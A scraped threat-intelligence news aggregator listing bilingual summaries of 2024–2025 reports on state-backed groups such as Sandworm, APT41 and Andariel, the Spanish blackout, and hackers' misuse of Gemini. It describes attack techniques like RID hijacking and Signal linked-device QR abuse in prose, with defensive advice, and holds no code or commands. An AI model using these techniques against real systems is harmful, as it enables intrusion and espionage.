What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2025-04-29 11:04:11 | Blackout d'Espagne: Cyber ou pas? Une analyse technique impartiale Spain\\'s blackout: Cyber or Not? An unbiased technical analysis (lien direct) |
 IntroductionYesterday afternoon, I was writing what should have been the regular newsletter when the power suddenly went out. I wasn\'t alarmed at all because I live in a mountain area, and power outages like this happen several times a year. It was a slightly windy day, so I assumed that maybe a tree had cracked and hit a low-voltage line or something similar. But, as it turns out, that wasn\'t the case. Instead, something unprecedented occurred, a \'zero energy\' event: the power grid in Spain and Portugal went down completely.As we can see from the following graph coming from Red Eléctrica Española (transmission system operator responsible for managing the Spanish electricity system), at 12:35pm suddenly 15 GW of generation power went \'missing\'. As the prime minister would explain during a press release: "in 5 seconds, 60% of the country\'s demand disappeared from the system". The interconnected power system is one of the most complex systems ever built. It is beyond the scope of this article to provide a detailed technical assessment of all possible non-cyber scenarios that could contribute to a \'black swan\' event. In fact, investigations into large-scale power outages typically take months to reach reliable conclusions. Therefore, I will leave this task to the experts, who have access to the necessary data to conduct such a complex analysis.However, there is specific information suggesting that a potential cyber attack could be behind this. For example:https://www.larazon.es/economia/cni-apunta-ciberataque-como-posible-causa-apagon_20250428680f7e19319ae75da4ba8c32.htmlThe President of the regional government of Andalusia (Spain) claims that, after consulting with cybersecurity experts, the massive power outage is likely the result of a cyber attack.https://www.eleconomista.es/energia/noticias/13337515/04/25/juanma-moreno-apunta-a-un-ciberataque-como-posible-causa-del-gran-apagon-en-espana.htmlMeanwhile, top European figures such as the European Council p |
Ransomware Malware Threat Studies Prediction Technical | APT 44 | ★★★ |
|
2025-04-18 11:53:49 | La fuite de serveur de logiciels malveillants de Keyplug expose les outils d'exploitation de pare-feu Fortinet et de VPN KeyPlug Malware Server Leak Exposes Fortinet Firewall and VPN Exploitation Tools (lien direct) |
> Les chercheurs en cybersécurité sont tombés sur un trésor d'outils et de scripts opérationnels liés aux logiciels malveillants de Keyplug, associés au groupe de menaces Redgolf, également connu sous le nom d'APT41. Le serveur, qui a été exposé par inadvertance pendant moins de 24 heures, a fourni un aperçu sans précédent des tactiques, techniques et procédures sophistiquées (TTP) employés par cette avancée […] avancée.
>Cybersecurity researchers have stumbled upon a treasure trove of operational tools and scripts linked to the KeyPlug malware, associated with the threat group RedGolf, also known as APT41. The server, which was inadvertently exposed for less than 24 hours, provided an unprecedented glimpse into the sophisticated tactics, techniques, and procedures (TTPs) employed by this advanced […] |
Malware Tool Threat | APT 41 | ★★★ |
 |
2025-04-15 08:22:39 | Les hacktivistes ciblent l'infrastructure critique, passez à des ransomwares Hacktivists Target Critical Infrastructure, Move Into Ransomware (lien direct) |
Présentation
Selon un nouveau rapport Cyble, les hacktivistes vont de plus en plus au-delà des activités traditionnelles telles que les attaques DDOS et les défaillances de sites Web en infrastructure critique plus sophistiquée et attaques de ransomwares.
Dans un rapport pour les clients, Cyble a déclaré que le hacktivisme s'est «transformé en un instrument complexe de guerre hybride» avec la montée en puissance des groupes qui ont adopté des techniques d'attaque plus sophistiquées plus généralement associées aux acteurs de l'État-nation et aux groupes de menaces motivés financièrement.
Hacktivism "ne se limite plus aux explosions idéologiques marginales", selon le rapport. «Il s'agit maintenant d'un appareil de cyber-insurrection décentralisé, capable de façonner les récits géopolitiques, de déstabiliser les systèmes critiques et de s'engager directement dans des conflits mondiaux à travers le domaine numérique.»
Le rapport CYBLE a examiné les groupes hacktiviste les plus actifs au premier trimestre de 2025, les nations et les secteurs les plus ciblés, les techniques d'attaque émergentes, et plus encore.
Les groupes hacktiviste les plus actifs ciblent l'infrastructure critique
Les hacktivistes pro-russes étaient les plus actifs au premier trimestre, dirigés par NONAME057 (16), Hacktivist Sandworm |
Ransomware Tool Vulnerability Threat Legislation Industrial Prediction Cloud Technical | APT 44 | ★★★ |
|
2025-02-20 13:21:16 | (Déjà vu) Russia-Linked Actors Exploiting Signal Messenger\\'s “Linked Devices” Feature for Espionage in Ukraine (lien direct) | 
Overview
Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia\'s intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists.
The tactics observed in this campaign include phishing attacks abusing Signal\'s linked devices feature, malicious JavaScript payloads and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques.
Google has partnered with Signal to introduce security enhancements that mitigate these attack vectors, urging users to update to the latest versions of the app.
Tactics Used to Compromise Signal Accounts
Exploiting Signal\'s "Linked Devices" Feature
Russia-aligned threat actors have manipulated Signal\'s legitimate linked devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers can link an actor-controlled device to the victim\'s account, enabling real-time message interception without full device compromise.
The phishing methods used to deliver these malicious QR codes include:
Fake Signal group invites containing altered JavaScript redirects.
Phishing pages masquerading as Ukrainian military applications.
|
Malware Tool Vulnerability Threat Mobile Cloud Conference | APT 44 | ★★ |
 |
2025-02-19 14:00:00 | Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger (lien direct) | Written by: Dan Black
Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia\'s intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia\'s re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war. Signal\'s popularity among common targets of surveillance and espionage activity-such as military personnel, politicians, journalists, activists, and other at-risk communities-has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats. We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features. Phishing Campaigns Abusing Signal\'s "Linked Devices" Feature The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app\'s legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim\'s account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim\'s secure conversations without the need for full-device compromise. |
Malware Threat Mobile Cloud Commercial | APT 44 | ★★ |
 |
2025-02-18 15:22:00 | Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign (lien direct) | The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024.
The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41
The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024. The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41 |
Threat Prediction | APT 41 | ★★★ |
 |
2025-02-13 22:27:57 | Microsoft details Seashell Blizzard BadPilot campaign targeting energy, telecom, government sectors (lien direct) | Microsoft has published its first research on a subgroup within the Russian state actor Seashell Blizzard, detailing a...
Microsoft has published its first research on a subgroup within the Russian state actor Seashell Blizzard, detailing a... |
APT 44 | ★★★★ | |
|
2025-02-13 21:27:54 | Microsoft Uncovers \\'BadPilot\\' Campaign as Seashell Blizzard Targets US and UK (lien direct) | Russian GRU-linked hackers exploit known software flaws to breach critical networks worldwide, targeting the United States and the…
Russian GRU-linked hackers exploit known software flaws to breach critical networks worldwide, targeting the United States and the… |
Threat | APT 44 | ★★★ |
|
2025-02-13 19:56:00 | North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks (lien direct) | A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors.
The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet
A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet |
Threat | APT 43 | ★★★ |
 |
2025-02-13 12:00:00 | Russian Seashell Blizzard Enlists Specialist Initial Access Subgroup to Expand Ops (lien direct) | Microsoft found that Russian state actor Seashell Blizzard has deployed an initial access subgroup to gain persistent access in a range of high-value global targets
Microsoft found that Russian state actor Seashell Blizzard has deployed an initial access subgroup to gain persistent access in a range of high-value global targets |
APT 44 | ★★★ | |
 |
2025-02-13 06:02:16 | Russia-Linked Seashell Blizzard Intensifies Cyber Operations Against Critical Sectors (lien direct) | The Russia-linked threat actor known as Seashell Blizzard has assigned one of its subgroups to gain initial access to internet-facing infrastructure and establish long-term persistence within targeted entity, a Microsoft report has revealed. Also dubbed APT44, BlackEnergy Lite, Sandworm, Telebots, and Voodoo Bear, Seashell Blizzard has been active since at least 2009 and is believed [...]
The Russia-linked threat actor known as Seashell Blizzard has assigned one of its subgroups to gain initial access to internet-facing infrastructure and establish long-term persistence within targeted entity, a Microsoft report has revealed. Also dubbed APT44, BlackEnergy Lite, Sandworm, Telebots, and Voodoo Bear, Seashell Blizzard has been active since at least 2009 and is believed [...] |
Threat | APT 44 | ★★★ |
|
2025-02-12 22:32:00 | Microsoft Uncovers Sandworm Subgroup\\'s Global Cyber Attacks Spanning 15+ Countries (lien direct) | A subgroup within the infamous Russian state-sponsored hacking group known as Sandworm has been attributed to a multi-year initial access operation dubbed BadPilot that stretched across the globe.
"This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations," the
A subgroup within the infamous Russian state-sponsored hacking group known as Sandworm has been attributed to a multi-year initial access operation dubbed BadPilot that stretched across the globe. "This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations," the |
APT 44 | ★★★ | |
 |
2025-02-12 18:14:48 | Subgroup of Russia\\'s Sandworm compromising US and European organizations, Microsoft says (lien direct) | The BadPilot hackers have expanded their focus beyond Ukraine and Eastern Europe, gaining initial access to dozens of strategically important organizations across the U.S. and U.K.
The BadPilot hackers have expanded their focus beyond Ukraine and Eastern Europe, gaining initial access to dozens of strategically important organizations across the U.S. and U.K. |
APT 44 | ★★★ | |
 |
2025-02-12 17:58:47 | Russian state threat group shifts focus to US, UK targets (lien direct) | >A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said.
>A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said. |
Vulnerability Threat | APT 44 | ★★★ |
 |
2025-02-12 17:00:00 | Microsoft: Russia\\'s Sandworm APT Exploits Edge Bugs Globally (lien direct) | Sandworm (aka Seashell Blizzard) has an initial access wing called "BadPilot" that uses standard intrusion tactics to spread Russia\'s tendrils around the world.
Sandworm (aka Seashell Blizzard) has an initial access wing called "BadPilot" that uses standard intrusion tactics to spread Russia\'s tendrils around the world. |
APT 44 | ★★★ | |
|
2025-02-11 20:00:00 | Cybercrime: A Multifaceted National Security Threat (lien direct) | Executive Summary Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders\' resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions. A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare\'s share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks mean that they must be taken seriously as a national security threat, no matter the motivation of the actors behind it. Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel the cyber support to their war in Ukraine. GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine and CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims\' crypto wallets. Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and public and private sectors on systemic solutions such as increasing education and resilience efforts. aside_block | Ransomware Malware Tool Vulnerability Threat Legislation Medical Cloud Technical | APT 41 APT 38 APT 29 APT 43 APT 44 | ★★★ |
 |
2025-01-31 19:21:04 | Hackers From China, North Korea, Iran & Russia Are Using Google’s AI For Cyber Ops (lien direct) | Google\'s Threat Intelligence Group (GTIG) has issued a warning regarding cybercriminals from China, Iran, Russia, and North Korea, and over a dozen other countries are using its artificial intelligence (AI) application, Gemini, to boost their hacking capabilities. According to Google\'s TIG report, published on Wednesday, state-sponsored hackers have been using the Gemini chatbot to improve their productivity in cyber espionage, phishing campaigns, and other malicious activities. Google examined Gemini activity linked to known APT (Advanced Persistent Threat) actors and discovered that APT groups from over twenty countries have been using large language models (LLMs) primarily for research, target reconnaissance, the development of malicious code, and the creation and localization of content like phishing emails. In other words, these hackers seem to primarily use Gemini as a research tool to enhance their operations rather than develop entirely new hacking methods. Currently, no hacker has successfully leveraged Gemini to develop entirely new cyberattack methods. “While AI can be a useful tool for threat actors, it is not yet the gamechanger it is sometimes portrayed to be. While we do see threat actors using generative AI to perform common tasks like troubleshooting, research, and content generation, we do not see indications of them developing novel capabilities,” Google said in its report. Google tracked this activity to more than ten Iran-backed groups, more than twenty China-backed groups, and nine North Korean-backed groups. For instance, Iranian threat actors were the biggest users of Gemini, using it for a wide range of purposes, including research on defense organizations, vulnerability research, and creating content for campaigns. In particular, the group APT42 (which accounted for over 30% of Iranian APT actors) focused on crafting phishing campaigns to target government agencies and corporations, conducting reconnaissance on defense experts and organizations, and generating content with cybersecurity themes. Chinese APT groups primarily used Gemini to conduct reconnaissance, script and develop, troubleshoot code, and research how to obtain deeper access to target networks through lateral movement, privilege escalation, data exfiltration, and detection evasion. North Korean APT hackers were observed using Gemini to support multiple phases of the attack lifecycle, including researching potential infrastructure and free hosting providers, reconnaissance on target organizations, payload development, and help with malicious scripting and evasion methods. “Of note, North Korean actors also used Gemini to draft cover letters and research jobs-activities that would likely support North Korea’s efforts to place clandestine IT workers at Western companies,” the company noted. “One North Korea-backed group utilized Gemini to draft cover letters and proposals for job descriptions, researched average salaries for specific jobs, and asked about jobs on LinkedIn. The group also used Gemini for information about overseas employee exchanges. Many of the topics would be common for anyone researching and applying for jobs.” Meanwhile, Russian APT actors demonstrated limited use of Gemini, primarily for coding tasks such as converting publicly available malware into different programming languages and incorporating encryption functions into existing code. They may have avoided using Gemini for operational security reasons, opting to stay off Western-controlled platforms to avoid monitoring their activities or using Russian-made AI tools. Google said the Russian hacking group’s use of Gemini has been relatively limited, possibly because it attempted to prevent Western platforms from monitoring its activities | Malware Tool Vulnerability Threat Legislation Cloud | APT 42 | ★★★ |
|
2025-01-29 14:00:00 | Adversarial Misuse of Generative AI (lien direct) | Rapid advancements in artificial intelligence (AI) are unlocking new possibilities for the way we work and accelerating innovation in science, technology, and beyond. In cybersecurity, AI is poised to transform digital defense, empowering defenders and enhancing our collective security. Large language models (LLMs) open new possibilities for defenders, from sifting through complex telemetry to secure coding, vulnerability discovery, and streamlining operations. However, some of these same AI capabilities are also available to attackers, leading to understandable anxieties about the potential for AI to be misused for malicious purposes. Much of the current discourse around cyber threat actors\' misuse of AI is confined to theoretical research. While these studies demonstrate the potential for malicious exploitation of AI, they don\'t necessarily reflect the reality of how AI is currently being used by threat actors in the wild. To bridge this gap, we are sharing a comprehensive analysis of how threat actors interacted with Google\'s AI-powered assistant, Gemini. Our analysis was grounded by the expertise of Google\'s Threat Intelligence Group (GTIG), which combines decades of experience tracking threat actors on the front lines and protecting Google, our users, and our customers from government-backed attackers, targeted 0-day exploits, coordinated information operations (IO), and serious cyber crime networks. We believe the private sector, governments, educational institutions, and other stakeholders must work together to maximize AI\'s benefits while also reducing the risks of abuse. At Google, we are committed to developing responsible AI guided by our principles, and we share | Ransomware Malware Tool Vulnerability Threat Studies Legislation Mobile Industrial Cloud Technical Commercial | APT 41 APT 43 APT 42 | ★★★ |
|
2025-01-28 14:00:00 | ScatterBrain: Unmasking the Shadow of PoisonPlug\\'s Obfuscator (lien direct) | Written by: Nino Isakovic
Introduction Since 2022, Google Threat Intelligence Group (GTIG) has been tracking multiple cyber espionage operations conducted by China-nexus actors utilizing POISONPLUG.SHADOW. These operations employ a custom obfuscating compiler that we refer to as "ScatterBrain," facilitating attacks against various entities across Europe and the Asia Pacific (APAC) region. ScatterBrain appears to be a substantial evolution of ScatterBee, an obfuscating compiler previously analyzed by PWC. GTIG assesses that POISONPLUG is an advanced modular backdoor used by multiple distinct, but likely related threat groups based in the PRC, however we assess that POISONPLUG.SHADOW usage appears to be further restricted to clusters associated with APT41. GTIG currently tracks three known POISONPLUG variants: POISONPLUG POISONPLUG.DEED POISONPLUG.SHADOW 
POISONPLUG.SHADOW-often referred to as "Shadowpad," a malware family name first introduced by Kaspersky-stands out due to its use of a custom obfuscating compiler specifically designed to evade detection and analysis. Its complexity is compounded by not only the extensive obfuscation mechanisms employed but also by the attackers\' highly sophisticated threat tactics. These elements collectively make analysis exceptionally challenging and complicate efforts to identify, understand, and mitigate the associated threats it poses.
In addressing these challenges, GTIG collaborates closely with the FLARE team to dissect and analyze POISONPLUG.SHADOW. This partnership utilizes state-of-the-art reverse engineering techniques and comprehensive threat intelligence capabilities required to mitigate the sophisticated threats posed by this threat actor. We remain dedicated to advancing methodologies and fostering innovation to adapt to and counteract the ever-evolving tactics of threat actors, ensuring the security of Google and our customers against sophisticated cyber espionage operations.
Overview
In this blog post, we present our in-depth analysis of the ScatterBrain obfuscator, which has led to the development of a complete stand-alone static deobfuscator library independent of any binary analysis frameworks. Our analysis is based solel |
Malware Tool Threat Studies Patching Cloud | APT 41 | ★★ |
|
2025-01-25 20:07:25 | Hackers Using RID Hijacking To Create Admin Accounts In Windows (lien direct) | Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts.
According to ASEC researchers, AhnLab’s security intelligence center, the hacking group behind the attack is the “Andariel” threat group, linked to North Korea’s Lazarus hacker group.
“RID Hijacking is an attack technique that involves modifying the RID value of an account with low privileges, such as a regular user or a guest account, to match the RID value of an account with higher privileges (Administrator). By modifying the RID value, threat actors can deceive the system into treating the account as having administrator privileges,” AhnLab wrote in a blog post published on Thursday.
In Windows, a Relative Identifier (RID) is part of a Security Identifier (SID), which exclusively distinguishes each user and group within a domain. For instance, an administrator account will have a RID value of “500”, “501” for guest accounts, “512” for the domain admins group, and for regular users, the RID will start from the value “of 1000”.
In a RID hijacking attack, hackers change the RID of a low-privilege account to the same value as an administrator account. As a result, Windows grants administrative privileges to the account.
However, to pull this off, attackers need access to the SAM (Security Account Manager) registry, which requires them to already have SYSTEM-level access to the targeted machine for modification.
Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt.
While SYSTEM access is the highest privilege in Windows, it has certain limitations: it doesn\'t allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected and doesn\'t persist after a system reboot.
To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a “$” character to its username.
This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account’s privileges to the administrator level.
According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system.
The group tweaked the SAM registry using custom malware and an open-source tool to execute the RID hijacking.
Although SYSTEM access could allow the direct creation of administrator accounts, this method is less conspicuous, making it difficult to detect and prevent.
To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder.
To reduce the risk of RID hijacking, system administrators should implement proactive measures such as:
Use the Local Security Authority (LSA) Subsystem Service to monitor unusual login attempts and password changes.
Prevent unauthorized access to the SAM registry.
Restricting the use of tools like PsExec and JuicyPotato.
Disabling guest accounts.
Enforcing multi-factor authentication (MFA) for all user accounts, including low-privileged ones.
Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to ASEC researchers, AhnLab’s security intelligence center, the hacking group behind the attack is the “Andariel” threat group, linked to North Korea’s Lazarus hacker group. “RID Hijacking is |
Malware Tool Threat | APT 38 APT 45 | ★★ |
 |
2024-12-30 19:16:07 | Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger) (lien direct) | ## Snapshot ASEC reports that the Andariel threat group has resumed attacks to distribute SmallTiger malware, targeting Korean software solutions, including asset management and document management tools. ## Description ASEC reports that the Andariel group (tracked by Microsoft as [Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0)) exploits vulnerabilities in asset management solutions to gain control over systems. Most of these attacks resulted in the installation of ModeLoader. In one case, the attackers used [brute-force](https://security.microsoft.com/threatanalytics3/d44f2c6d-6901-4967-82b7-7ffe4f7276e7/overview) and dictionary attacks on exposed update servers to replace update programs with malicious versions, enabling them to distribute SmallTiger. In recent cases, researchers have found SmallTiger in the installation paths of asset management solutions alongside a keylogger. This keylogger stored captured keystrokes in the temporary file "MsMpLog.tmp." The attackers also configured infected systems for future Remote Desktop Protocol (RDP) access. Additionally, they deployed an open-source tool called CreateHiddenAccount to add and conceal a backdoor account. The threat group also targets document management solutions by exploiting outdated Apache Tomcat web servers. After gaining initial access, they query system information and install an Advanced Port Scanner. They then install a web shell via PowerShell commands with the download server also identified as the command-and-control server address for SmallTiger. ## Microsoft Analysis and Additional OSINT Context [Microsoft researchers determined](https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/) that SmallTiger is a C++ backdoor with layered obfuscation, encountered in the wild as a Themida or VMProtect packed executable. [In February 2024](https://asec.ahnlab.com/ko/73907/), ASEC first identified SmallTiger targeting South Korean defense and manufacturing organizations. Subsequently, in May 2024, Microsoft observed Onyx Sleet conducting attacks using SmallTiger, specifically targeting South Korean defense organizations. Onyx Sleet is a North Korea-affiliated activity group that conducts cyber espionage through numerous campaigns with the goal of intelligence gathering and financial gain. The threat actor utilizes a wide range of custom tools and malware, while maintaining a consistent attack chain approach, especially to organizations of interest to North Korean intelligence, such as those in the defense, engineering, and energy sectors. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Maintain good [cyber hygiene](https://www.microsoft.com/en-us/microsoft-365-life-hacks/privacy-and-safety/cyber-hygiene) and follow online safety best practices to help prevent keylogging. - Install antivirus software. Many antivirus software options now include anti-keylogger and anti-spyware protection. This software can help you identify and avoid keylogging malware. Installing and keeping antivirus software up to date helps prevents data theft. - Regularly update security settings, and if a device is no longer receiving updates, strongly consider replacing it with a new device. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Avoid downloading files from unsafe websites or clicking links in an email from an unknown sender. Phishing has become more sophisticated, so you should be cautious of clicking links or downloading attachments from peopl | Malware Tool Vulnerability Threat | APT 45 | ★★ |
 |
2024-12-13 15:00:00 | New Yokai Side-loaded Backdoor Targets Thai Officials (lien direct) | >Summary DLL side-loading is a popular technique used by threat actors to execute malicious payloads under the umbrella of a benign, usually legitimate, executable. This allows the threat actor to exploit whitelists in security products that exclude trusted executables from detection. Among others, this technique has been leveraged by APT41 to deploy DUSTTRAP and Daggerfly […]
>Summary DLL side-loading is a popular technique used by threat actors to execute malicious payloads under the umbrella of a benign, usually legitimate, executable. This allows the threat actor to exploit whitelists in security products that exclude trusted executables from detection. Among others, this technique has been leveraged by APT41 to deploy DUSTTRAP and Daggerfly […] |
Threat | APT 41 | ★★★ |
|
2024-12-11 22:38:07 | Likely China-based Attackers Target High-profile Organizations in Southeast Asia (lien direct) | #### Targeted Geolocations - Southeast Asia #### Targeted Industries - Government Agencies & Services - Transportation Systems - Aviation - Communications Infrastructure ## Snapshot Researchers at Symantec detailed an espionage campaign, active since at least October 2023, likely conducted by China-based threat actors. The campaign targeted organizations in a number of industries, including government, telecommunications, and aviation. ## Description The attackers employed a mix of open-source (e.g., Dismap, [Impacket](https://security.microsoft.com/intel-profiles/19a4861eb55c4c074ab0a8c6f58738d8f50dda8badf96695758399e3d826dda6), and FastReverseProxy) and living-off-the-land (e.g., PowerShell, Reg.exe, and Windows Management Instrumentation) tools in their attacks. Many of these tools have been previously observed in attacks attributed to Chinese actors including Rakshasa, a tool previously used by Earth Baku and SharpNBTScan, a .NET application previously used by Mustang Panda (tracked by Microsoft as [Twill Typhoon](https://security.microsoft.com/intel-profiles/01aef6bb1a4cd12178aca7fceb848002164b83bf375fa33699ed4c5523b4fd3c)). The operations focused on exfiltrating data of interest, including credentials, from targeted organizations. The threat actors maintaining prolonged access to target environments, allowing them to map the network and identify systems of interest. According to Symantec, data was exfiltrated using WinRAR to gather and compress files of interest into password-protected archives. These archives were then uploaded to cloud storage platforms like File.io, allowing the attackers to discreetly transfer the data. ## Microsoft Analysis and Additional OSINT Context Most Chinese threat activity is for intelligence collection purposes and, as represented in Microsoft Threat Intelligencce nation-state notification (NSN) data, especially prevalent in Association of Southeast Asian Nations countries around the South China Sea. To learn more about Chinese cyber threat activity in and around the South China Sea, read [Microsoft\'s most recent Digial Defense Report](https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/final/en-us/microsoft-brand/documents/Microsoft%20Digital%20Defense%20Report%202024%20%281%29.pdf). ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Turn on [tamper protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection) features to prevent attackers from stopping security services. - Run [endpoint detection and response (EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode) so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach. - Enable [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations) in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. ## Detections/Hunting Queries ### Microsoft Defender Antivirus Microsoft Defender Antivirus detects threat components as the following malware: - [Trojan:Win32/LotusBlossom](https://www.microsoft.com/en-us/wdsi/threats/mal | Malware Tool Threat Cloud | APT 41 | ★★★ |
|
2024-12-09 12:22:03 | Weekly OSINT Highlights, 9 December 2024 (lien direct) | ## Snapshot Last week\'s OSINT reporting highlights a diverse range of cyber threats spanning ransomware, espionage, supply chain attacks, and disinformation campaigns. Espionage activity remains prominent, with Chinese and Russian actors targeting organizations for geopolitical and industrial intelligence. Key trends include the exploitation of vulnerabilities in widely used software, such as Apache ActiveMQ (CVE-2023-46604) and Docker APIs, and advanced malware like SmokeLoader and MOONSHINE to target industries ranging from manufacturing to financial services. Ransomware groups, including Howling Scorpius and Venom Spider, leverage sophisticated techniques like double extortion and hybrid encryption, focusing on SMBs and enterprises. Targets span global industries, including sensitive infrastructure, while attack vectors predominantly involve phishing, misconfigured systems, and supply chain manipulation, underscoring the adaptability and persistence of modern threat actors. ## Description 1. [Manufacturing Sector Cyberattack](https://sip.security.microsoft.com/intel-explorer/articles/d976ecc3): Cyble Research and Intelligence Labs uncovered a campaign targeting the manufacturing sector with malicious LNK files masquerading as PDFs. The attack employs LOLBins, DLL sideloading, and advanced obfuscation techniques, using tools like Lumma stealer and Amadey 